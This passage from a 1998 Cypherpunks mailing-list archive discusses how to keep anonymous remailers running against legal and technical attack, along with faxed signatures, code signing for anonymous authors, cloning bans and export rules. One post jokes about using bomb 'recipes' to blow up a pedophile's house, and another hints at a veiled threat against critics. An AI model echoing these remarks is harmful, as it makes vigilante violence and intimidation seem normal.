investigation, he alluded to the fact that he was just tired of the
hassles.  Weasel did not shut down because of the law, but due to the
desire to not expose his ISP to hassles.

Traditional law enforcement takes so long to investigate, the keys could be
canceled and replaced several times.  In the US I don't think that law
enforcement really cares enough to issue a warrant.  Almost no warrants
have ever been issued for remailers.  Though I would not be surprised to
find that intense extra-legal investigations were done on cases that
involved situations such as Jim Bell's Assassination Politics.

Cracker goes off line for a few hours every month.  We basically never lose
messages, but we can delay some.  We have a downtime between 1.6% and 3% on
the overall average.  This is our remailer only.  Compare this with the
network - we only had 26 minutes of downtime in the last 365 days.
Recently another remailer went down due to a hard drive problem - for a
week or more.  Software and hardware problems are significant issues for
remailers.  Another is incompatibilities in moving data from one mail host
to another.  Every once in awhile machines just become incompatible, often
due to sendmail configurations designed to block spam or provide better
security.

As for hacking attacks, Cracker/EFGA has had some people censured by their
ISP for stuff like spoofing us, mailbombing, and that good 'ole ping thing.
 To be honest, we've never been hurt by it anyway, but we do monitor for
such things.

A significant problem is in design.  The remailer network is not designed
to be robust or fault tolerant.  There is no error notification to the
user.  If your message gets dropped along the way, there is no recovery
system that gets it through another route.  If you misspell your
destination address, or other problem exists, you don't get notified of the
event.

Still for a group of volunteers running software that is patched almost
every week, providing services for free - they don't do a bad job.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Fri, 16 Jan 1998 18:00:36 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: remailer resistancs to attack
In-Reply-To: <199801160125.BAA00650@server.eternity.org>
Message-ID: <199801160956.EAA03776@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Adam Back:
> Public access servers aren't a good idea.  Really people should be
> running local access servers only.  The index is local, cache is
> local, and USENET is a distributed broadcast medium.

True.

> However it seems to me that the weakest point is the remailer network.
> It seems likely that it would be much easier for governments to shut
> down the remailer network than it would be to shut down USENET.  There
> are only around 20 or so remailers, and they all have known IP
> addresses, operators, localities, etc.  I expect the spooks could shut
> them down with less than 1 days notice if they wanted to.
> 
> How do we improve the resistance of the remailer network to well
> resourced attackers intent on dismantling it?

By having anonymous remailers which are themselves anonymous -- running
on discarded accounts, only known by a few other remailers, not the
general public, perhaps by splitting up remailer addresses as a 
shared secret, so one remailer knows there is a "foo remailer" it can
use, and has 1 of 3 where 2 pieces are necessary to have the address. and
sends it to another remailer which may have the other part of the address.

Perhaps probabilistic routing?  Remailers which don't know all the components
to an address, see how many they can assemble, and choose randomly?  It
does make enforcing "I want this remailed through multiple independent
groups in case you're a fed" more difficult for the user -- perhaps they
could send pieces of the message to be reassebled inside the remailer network?

All of this is great, but it's a lot of work, and remailers are quickly
consumed in this model.  Thus what I think is the true solution:

Providing a financial incentive for people to run remailers.  This requires
digital cash.  I believe digital cash will soon exist, and thus this will
soon be possible.

(Also, a lot of these techniques would be valid in a higher performance
non-email based system.  Or even in a "type III" remailer network where
secret sharing and probability and high traffic are used in place of message 
pools.  Message pools are a direct tradeoff of performance for security --
an unacceptable tradeoff for current interactive systems, unless one could
prefetch very effectively, or if so many people used a server that its
message pool would not need to sit around very long -- this means
the average user would be using a very small amount of the resources of
a very large and highly loaded server -- this makes the large and highly
loaded server an attractive target for attack.
> 
> Adam

- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNL8uuKwefxtEUY69AQGUuwgAwl0YJM/Qd7uPySeEWQq+Dne0HezmAKSl
iNkJmgK352V1xz2wBqKtCnvt74WffvonA8ggtlq7Qw/KrYP+i0gkYmQ0wm7FDeWc
rhpLtymFhr7BDyGV2gusiYHOW9yFCQ381YeXxSuc/l3SKi2IV9l3fXFcGlMCRr1E
vHUYPimEGSiKJgr6P0wjS++6fz0KYlkKy4US4YUIFqh0jmoIf018UgZPVhwnmaj6
pyzzesRk0X183fmDinXwQCP/UE+DnwfYl5tl9Uv+cRXRbkRZe6zLik+gig1H9inz
SIdkGS9PjV2EuA+kKysFEARWaLh8U6oppBwJrk/cUs6zdBAgnNo/sw==
=/ssf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Fri, 16 Jan 1998 12:32:54 +0800
To: cypherpunks@cyberpass.net
Subject: Add me to the mailing list
Message-ID: <199801160415.FAA10709@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>mws@conch.net

Do it yourself like an intelligent individual. Cypherpunks write code. If
you can't figure out how to use Majordomo this list probably isn't for you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Fri, 16 Jan 1998 12:49:35 +0800
To: mark@unicorn.com
Subject: Re: Sealand (was Re: (eternity) autonomous agents)
In-Reply-To: <884866825.4040.193.133.230.33@unicorn.com>
Message-ID: <Pine.BSF.3.96.980116054339.2678A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 15 Jan 1998 mark@unicorn.com wrote:
> 
> I'd be interested to know where you got your information from, because
> both Strauss ('How to start your own country') and the Micronations
> Web page tell different stories; that Sealand was set up mostly for fun
> by a couple of guys who made a lot of money from pirate radio and
> it lasted at least fifteen years.

You might want to search the NYT archives. Back the, Sealand was mentioned
in the mainstream press.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Fri, 16 Jan 1998 16:12:50 +0800
To: cypherpunks@ssz.com
Subject: No Subject
In-Reply-To: <199801160402.WAA08670@einstein.ssz.com>
Message-ID: <199801160755.IAA07967@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> wrote:
> If you're looking for a good beginners book for number theory that
> is focused on using computer programs (BASIC) then check out:

A free/share-ware version of BASIC was released a few years ago,
called UBASIC, which understands big integers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 16 Jan 1998 22:53:14 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: remailer resistancs to attack (fwd)
Message-ID: <199801161517.JAA10130@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: remailer resistancs to attack 
> Date: Fri, 16 Jan 1998 04:56:12 EST
> From: Ryan Lackey <rdl@mit.edu>

> Adam Back:
> > Public access servers aren't a good idea.  Really people should be
> > running local access servers only.  The index is local, cache is
> > local, and USENET is a distributed broadcast medium.
> 
> True.

Where do these private access servers get/send their traffic ultimately?

> By having anonymous remailers which are themselves anonymous -- running
> on discarded accounts, only known by a few other remailers,

So we have lots of little groups of remailers that are hidden from public
view by a 'ring' of public remailers (required if we want the general public
to access them)? By what mechanism do I as a 'secret' remailer let others
know about my existance and hence willingness to carry traffic? By what
mechanism is my trustworthyness to be judged for this secret duty?

> general public, perhaps by splitting up remailer addresses as a 
> shared secret, so one remailer knows there is a "foo remailer" it can
> use, and has 1 of 3 where 2 pieces are necessary to have the address. and
> sends it to another remailer which may have the other part of the address.

Doesn't the remailer have to know who to ask to have a reasonable shot at
getting the pieces? Isn't the list of sources going to have to be publicly
accessible? Doesn't this also increase the bandwidth problem? Considering
the scale required to impliment this, where is the monetary pay off for
these secret remailers?

> Providing a financial incentive for people to run remailers.  This requires
> digital cash.  I believe digital cash will soon exist, and thus this will
> soon be possible.

At least one current potential for income is the indipendant key server.
Charge some amount to keep the keys for a year and charge per access by
remailers since they would be commercial enterprises. If the cost were
pennies per access you could even access the casual individual user who
wants to pull a key (though I personaly would like to see this cost be born
by the key server operator).


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 16 Jan 1998 23:02:12 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: remailer resistancs to attack (fwd)
Message-ID: <199801161527.JAA10183@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Jan 1998 04:50:37 -0500
> From: "Robert A. Costner" <pooh@efga.org>
> Subject: Re: remailer resistancs to attack

> An obvious thing to try is to add some more remailers.  300 remailers would
> not be immune to simultaneous shutdown by the authorities, but it would
> make it more difficult.  A dozen of so remailers makes shutdown fairly simple.

Considering that the federal law enforcement agencies have had decades to
deal with organized crime and such over a national and even international
level, 100' level warrants is not even a resource strain if the pay off is
large enough. Now if we had 10,000 or 100,000 the picture begins to change
radicaly.

> Threats to the remailer network come from a few basic places.
> 
>   1.  Traditional law enforcement
>   2.  Unauthorized law enforcement
>   3.  "friends" of message recipients or "friends" of the remailer
>   4.  unreliability of the machines that form the network
>   5.  Hacking attacks
>   6.  Design
>   7.  User incompetence
    8.  Operator incompetence
    9.  initial startup difficulties
   10.  lack of an effective financial model

> Traditional law enforcement takes so long to investigate, the keys could be
> canceled and replaced several times.

This is another problem with the entire crypto process as now implimented.
Users of keys, either for encryption or signing, tend to think of the keys
as long term entities. Considering the increase in computing power, the
coming ubiquity of law enforcement monitoring on the network, increased
payoff for hackers as the traffic of personal info increases, and general
human failure keys should in fact be changed often (say a couple of times a
year, annualy at least)

> A significant problem is in design.  The remailer network is not designed
> to be robust or fault tolerant.  There is no error notification to the
> user.  If your message gets dropped along the way, there is no recovery
> system that gets it through another route.  If you misspell your
> destination address, or other problem exists, you don't get notified of the
> event.

These are all criticisms of the TCP/IP and associated network mechanisms and
not specific faults in the remailer model. It has to work with what it has.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Sat, 17 Jan 1998 01:42:40 +0800
To: Tim May <rdl@MIT.EDU
Subject: Re: remailer resistancs to attack
In-Reply-To: <199801160125.BAA00650@server.eternity.org>
Message-ID: <v03102805b0e4d19c6659@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:37 PM -0800 1/15/98, Tim May wrote:
>At 5:25 PM -0800 1/15/98, Adam Back wrote:
>>Ryan Lackey <rdl@mit.edu> writes:
>>However it seems to me that the weakest point is the remailer network.
>>It seems likely that it would be much easier for governments to shut
>>down the remailer network than it would be to shut down USENET.  There
>>are only around 20 or so remailers, and they all have known IP
>>addresses, operators, localities, etc.  I expect the spooks could shut
>>them down with less than 1 days notice if they wanted to.
>
>Well, I have long argued for the need for thousands of remailers, esp. the
>"everyone a remailer" model.
>
>But, although I agree we need many  more remailers, I think Adam overstates
>the ease with which remailers can be shut down, at least in the U.S.

Came across this paper and thought it might address remailer reliability, "How to Maintain Authenticated Communication in the Presence of Break-ins," http://theory.lcs.mit.edu/~tcryptol/OLD/old-02.html

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 17 Jan 1998 02:22:07 +0800
To: cypherpunks@toad.com
Subject: Legality of faxed signatures.
Message-ID: <199801161807.KAA28571@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
I believe that there is case law or legislation that a faxed
signature is worthless if it is bit for bit identical with
another signature, which of course it usually is these days.

Can anyone with a spot of legal knowledge give me something
impressive sounding to scare people who rely on those
signatures.





    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     m3FpGHzBYajbGdNyApmYfwBYZOzY44LHPv7+KZPs
     4hFtbEu745IQyZxamC5p6PUwCCpOVAo/LKzZD8Uqu
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Sat, 17 Jan 1998 02:28:28 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
In-Reply-To: <199801131602.RAA06619@basement.replay.com>
Message-ID: <3.0.5.32.19980116101728.00841910@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:02 AM 1/13/98 -0800, Tim May wrote:
>As I have made clear, I don't believe "banning research" which is neither
>"commerce between the states" nor a direct harm to others (as the "robbery"
>example Michael Froomkin used earlier as a parallel is), is supported by
>the Constitution.

There are different degrees of UnConstitutionalness.  Some things are so
blatantly off the edge that even if Congress passed them, they'd be laughed
out of the first court that addressed them, like banning plant-growing
or discrete mathematics or arresting everybody with Japanese ancestors.
Others are much grayer areas, where court cases addressing them 
would take a long time and cost a lot of money, which can be prohibitively
expensive for the early phases of research.

>And if the cloning ban is a ban on research in certain areas, as many are
>pushing for (but, again, the final laws have not been proposed, much less
>passed, so we'll have to wait), then is this not prior restraint on
>publishing?

At least for the US, the important issue is that Congress hasn't passed 
any laws, nor do they need to - this is a speechmaking opp for Clinton,
and maybe for a few right-wing or left-wing Congresscritters,
so they can all sound concerned about this scary new technology,
and so the public will remember that they feel our pain.

A much more realistic, and Constitutional, possibility is that the Feds
will ban use of Federal money for cloning research.  As a civil
libertarian, I think that's just fine, and they should do the same
to other controversial research, like nuclear weapons and fetal parts,
for which significant fractions of the public don't want to be forced
to fund those activities they believe to be immoral or dangerous.

Alternatively, [Note: End of serious section] they could use the
confiscatory tax model pioneered with the machine gun and marihuana bans -
the tax on cloning body parts is an arm and a leg, but if you
clone an entire human it'll cost you your firstborn child...
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Sat, 17 Jan 1998 02:59:11 +0800
To: Privacy Admin <woz@privacynb.ml.org>
Subject: Re: Forwarding remailer-ops posts
In-Reply-To: <Pine.LNX.3.95.980116095506.26249E-100000@privacynb.ml.org>
Message-ID: <34BFA4FD.67FC@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain



XXXX wrote:
> 
> >   Those who have never operated a remailer fail to realize that
> > the main goal of a remailer-operator should not be to provide
> > a non-discriminatory forwarding service for anonymous users, but
> > to ensure continued operation by not ruffling the feathers of
> > upstream providers, and to provide a spam/UCE filtering service
> 
> If the xxxx remailer was to allow non-PGP message and to stop
> processing block requests, would you be willing to underwrite any legal
> costs incurred?

  Nope. I have always found that those who attempt to cause me legal
problems find themselves suddenly beset by problems of a much greater
magnitude than those presented by my presence and actions, and quickly
turn their attention to dealing with the greater problems in their life.

> You yourself know how repressive the Canadian government is, look at the
> RCMP takeover in Moncton, look at the RCMP attacking (law-abiding)
> protestors at APEC, it is all around us. We are trying to preserve feedoms
> in Canada, but I don't see any results from your cynical crap. All you
> seem to do is whin, poke fun, and annoy. At the end of the day how much
> have you done? I am growing tried of your holier than thou speech from the
> throne.

  Actually, it is difficult to maintain a 'holier than thou' attitude
when you're a cynical, whining, annoying asshole (but Lord knows, I 
try).
  As to how much I *do* by the end of the day, it is really nobody's
business but my own, since the repressive forces you mention above
make it advisable for many forms of active resistance to oppression
to be done quietly, or from the shadows.
  Even when poking fun at fellow remailer-operators who sometimes
appear to have forgotten that their original objective was to drain
the swamp, I assume that the activities reflected in their public
communications are not necessarily representative of their total
contribution to providing tools and services supporting the basic
human rights and freedoms which have become increasingly dangerous
to exercise.

  The public remailers being maintained are an important training
ground and showcase for the communications and privacy/anonymity
tools being developed and used in their operation, but their very
availability itself results in their exposure to the haphazard
vagarities of social pressures and targeted oppression by those
forces which feel threatened by tools which allow others to avoid
being monitored and controlled.
  Current threads on the CypherPunks list regarding Eternity servers,
mirrors, BlackNet, covert and/or private backroads on the 'Super-
Highway', etc., are being disseminated to--and studied with great
interest by--a wide variety of individuals who are fast becoming
increasingly aware that the next few years will be turbulent times
wherein those who fail to take steps to cover their own ass will find
themselves being 'protected' by the government and corporate wolves
offering us technologies based only on the "Trust Us" system.
  Revolutions rarely begin with grand pronouncements and massive public
displays of resistance in the street. They usually begin in basements
and secret rooms where increasing numbers of citizens begin preparing
to protect and defend their own freedom and rights. When the shit hits
the fan, many are surprised to find how many of their friends and
neighbors have already been doing the same.

The Revolution is *always* NOW!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Fri, 16 Jan 1998 18:52:53 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Crypto Kong penetration.
In-Reply-To: <199801151836.KAA13648@proxy3.ba.best.com>
Message-ID: <19980116104604.39449@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Jan 15, 1998 at 12:08:46PM -0800, Tim May wrote:

> The fact is that most people don't see the need to either secure their
> messages against eavesdroppers or to sign their messages. But PGP was
> "cool" and rode the same wave that "Wired" rode.

Few messages to the cypherpunks list are signed.

-- 
Steve 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Sat, 17 Jan 1998 07:17:04 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: how to release code if the programmer is a target for coercion (fwd)
In-Reply-To: <Jim Choate's message of Wed, 14 Jan 1998 09:32:54 -0600 (CST)>
Message-ID: <3.0.3.32.19980116113405.006a44e8@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 01:41 AM 1/15/98 -0500, Ryan Lackey wrote:

>Another attack would be having 5 NSA agents sign a piece of code, but 
>you could prevent that by having the list made up of distinct well known
>individuals who are unlikely to all be bought -- if the NSA wants to
>give $100m each to the most frequent 100 posters on cypherpunks, I want
>to get in line :)

You can have cuts right behind me!
-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNL+2K8JF0kXqpw3MEQK5vgCdH8N7F7fyTkrWn1E+mBhznrIDqZwAnjpG
xE2ngJSG0BZJ4crdJb6EAYm8
=huFc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Sat, 17 Jan 1998 07:16:44 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for coercion (fwd)
In-Reply-To: <199801150835.CAA04627@einstein.ssz.com>
Message-ID: <3.0.3.32.19980116122934.006a44e8@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 02:35 AM 1/15/98 -0600, Jim Choate wrote:

>I'm assuming this has something to do with the eternity server/black_net
>discussion that has been going on. So I'll take a stab at it, not that it
>may make any sense in the actual context ...
>
> - You generate the code and sign it
>
> - You deliver the signed code to a data haven server of some architecture
>   (note that you don't know where it is or who runs it, I'll assume you
>    use some particular usenet newsgroup as your drop point)
>
> - Somebody else comes along and sees a list of available items and
selects
>   yours (again through a usenet based request mechanism).
>
> - They receive the code signed with 'your' key and decide they want to
>   verify the signing (through yet another usenet channel).
>
>The problem with this model is in the second step. What is to keep them
>from removing your signatory, moding the code, and then resigning it. If
the
>recipient desides they want to check the sign they have two choices:
>
> - select an anonymous key that has been previously stored on some sort of
>   key server.
>
>   (if they are running a eternity server blind they could be running a
>    key server blind as well, it follows that at least some of the
>    users of your software wanting to verify the signing will go to this
>    server and hence have corrupted code, if we're using the usenet model
>    this is even more likely since they could be running a feed point for
>    other usenet feeds downstream and hence capture many if not all
requests
>    for the product, especialy if they were the only server to actualy
>    carry a copy.)
>
> - contact you the author directly (I'm assuming of course you were silly
>   enough to put a publicly available key directly traceable to yourself
>   on it in the first place) in which case they simply intercede from a
>   upstream tap and verify their request in your behalf.
>
>In either case there is no guarantee that what comes off the server is
>what you the source put on there. Hence the long term security of the key
>is compromised. In particular, in the second case, since they already know
>who provided the illicit data to the server there motive is clearly to
>track the users. This breaks the anonymity of the data haven.
>
>Implicit in a workable data haven model is the goal of both source and
sink
>anonymity. This means that any signed data on the server must provide a
>mechanism for the user to verify the sign by access to a suitable key to
>generate the appropriate hash and compare it to the one that the server
>delivered. If they match you should have the correct unadulterated
document.

Jim, there are > 2 parties in the matter being discussed:  the author of
the item (who wishes to remain anonymous), the person who wishes to use the
item (who probably wishes to remain anonymous), and N
reviewers/authenticators of the item, who may or may not wish to be
anonymous.  In the case of the reviewers, signature verification may be
possible outside of the BlackNet/Eternity structure.  For example, I could
look at the source for Joes Awesome CryptoKillerApp, or the latest manual
from GunzenBomz Pyro-Technologies, and sign the files indicating that I
cannot find any security flaws or that I tried some of the "recipes" and
blew up a local pedophile's house.

My key is publicly available at the MIT keyserver; it has been since PGP
5.0 came out.  I have posted hundreds of times to Cypherpunks; most of
these posts have been signed with my key and include the fingerprint of my
key.  It would be fairly difficult for any attacker to forge a signature
with a false key; it would involve either rubber-hosing my passphrase,
changing history on all the Cypherpunks archives (including any on the item
end-user's machine and on the machines of all the Cypherpunks they
correspond with), or re-creating my private key from my public one.  A
similar situation exists for other entities that customarily sign their
posts, such as Bill Geiger, Monty Cantsin (assuming he ever got around to
posting his public key), Nerthus, etc.  "Certified by #314159" does not in
itself inspire confidence, but if hundreds of signed writings by #314159
exist, such that #314159 has high reputation capital, it begins to do so,
assuming that #314159's passphrase hasn't been rubber-hosed or otherwise
compromised.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNL/DK8JF0kXqpw3MEQL3agCdGY2Zj4lCoJjW+PRSyoc0Vyvd48cAoMwl
8ePeJ0Dbka+Jel+n1zSf+Zl/
=mG+m
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."
-- Samuel Adams

"Stupidity is the one arena of of human achievement where most people
fulfill their potential."
-- Jonathan Wienke

Never sign a contract that contains the phrase "first-born child."

When the government fears the people there is liberty.
When the people fear the government there is tyranny.
Those who live by the sword get shot by those who don't. 

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 17 Jan 1998 02:04:58 +0800
To: cypherpunks@toad.com
Subject: Wassenaar Rule Update
Message-ID: <1.5.4.32.19980116175815.006cbac0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Update of yesterday's post:

The Bureau of Export Administration published 15 January 1998 in 
the Federal Register, "Implementation of the Wassenaar Arrangement 
List of Dual-Use Items: Revisions to the Commerce Control List and 
Reporting Under the Wassenaar Arrangement; Rule."

The rule in TXT format is available in three parts as published:

  http://jya.com/bxa-wa-rule.txt  (354K)
  http://jya.com/bxa-wa-rule2.txt  (373K)
  http://jya.com/bxa-wa-rule3.txt  (32K) 

Or all three parts (742K) in a compressed self-extracting Zip file:

  http://jya.com/bxa-wa-rule.exe (194K)

Excerpt for Category 5 -- Telecommunications and "Information Security":

  http://jya.com/bxa-wa-cat5.htm  (39K)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Little" <gonad99@earthlink.net>
Date: Sat, 17 Jan 1998 02:36:58 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199801161822.KAA26360@denmark.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi. I just recently subscribed to your mailing list. I've read ALL of your
stuff. I just don't understand what it is u guys are really about. Please
help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <president@whitehouse.gov>
Date: Sat, 17 Jan 1998 03:47:43 +0800
To: "'James Little'" <cypherpunks@toad.com>
Subject: RE:
In-Reply-To: <199801161822.KAA26360@denmark.it.earthlink.net>
Message-ID: <199801161934.NAA16266@pc1824.ibpinc.com>
MIME-Version: 1.0
Content-Type: text/plain



If we knew the list would not be any fun!

-----Original Message-----
From: owner-cypherpunks@cyberpass.net
[mailto:owner-cypherpunks@cyberpass.net]On Behalf Of James Little
Sent: Friday, January 16, 1998 12:24 PM
To: cypherpunks@toad.com
Subject: 


Hi. I just recently subscribed to your mailing list. I've read ALL of your
stuff. I just don't understand what it is u guys are really about. Please
help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sat, 17 Jan 1998 02:46:26 +0800
To: Blanc <blancw@cnw.com>
Subject: Re: Microsoft Metaphors
In-Reply-To: <3.0.5.32.19980115230112.0087a340@cnw.com>
Message-ID: <34BFD47A.1DAF@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Blanc wrote:
> 
> The new upcoming version of Windows gives the user the choice of using
> Internet Explorer as the main interface for access to the desktop icons,
> the computer files, internet services like AOL, or web pages.   It is still
> the user's choice to use Win95 as they are accustomed to - they must
> manually select this option in order to use it - but it is a new way of
> using Internet Explorer, for more than just viewing web pages.
> 
> You could say it is becoming the window from which to view the rest of the
> rooms in the house, including what's beyond, outside of it.
>     ..
> Blanc

It is currently available for such use.  No just upcoming.
PHM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 17 Jan 1998 06:25:42 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Legality of faxed signatures.
Message-ID: <199801162211.OAA14165@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
Thanks, though this sounds like a silly judgment.

It looks to me as if the great majority of judges and 
lawyers, and hence presumably the great majority of CEOs, are 
blissfully unaware that one can do anything with a fax other 
than scan it in from paper and ink at one end, while it is 
printed out on paper and ink at the other end.

In actual fact a very large proportion of faxes never see 
paper and ink at either end, creating endless opportunities 
for manipulation.

This is a big problem for me, because I want to scare
businessmen into using digital signatures.  

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     E05oBvvh8W9NDUWZgPx6YirXgrcL6+CEkbWuhVNo
     4MQrt6D7Hjqw8OzIX9J2wbPBc7D77B+PochPDi4KZ


At 02:35 PM 1/16/98 -0500, Robert A. Costner wrote:
>At 10:07 AM 1/16/98 -0800, James A. Donald wrote:
>>I believe that there is case law or legislation that a faxed
>>signature is worthless if it is bit for bit identical with
>>another signature, which of course it usually is these days.
>>
>>Can anyone with a spot of legal knowledge give me something
>>impressive sounding to scare people who rely on those
>>signatures.
>
>In Georgia, the state appeals court declared that faxes are "beeps and
>chirps" and therefore not writings.  As a fax is not a writing, it cannot
>have a signature.  Therefore the signature cannot be valid.  This was in a
>case that involved a required notice to arrive by a certain time.
>
>Traditionally, on a writing anything is a signature including an 'X', spit,
>and the words "Mickey Mouse".
>
>
>  -- Robert Costner                  Phone: (770) 512-8746
>     Electronic Frontiers Georgia    mailto:pooh@efga.org  
>     http://www.efga.org/            run PGP 5.0 for my public key
>
>
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sat, 17 Jan 1998 03:24:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <c69db5864f21ca19419cc72018fe7176@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "wabe" <wabe@smart.net>
Date: Sat, 17 Jan 1998 03:51:26 +0800
To: <cypherpunks@toad.com>
Subject: Re: I'm going to count to ten... etc
Message-ID: <004b01bd22ce$7c76a6c0$ab8588d1@justice>
MIME-Version: 1.0
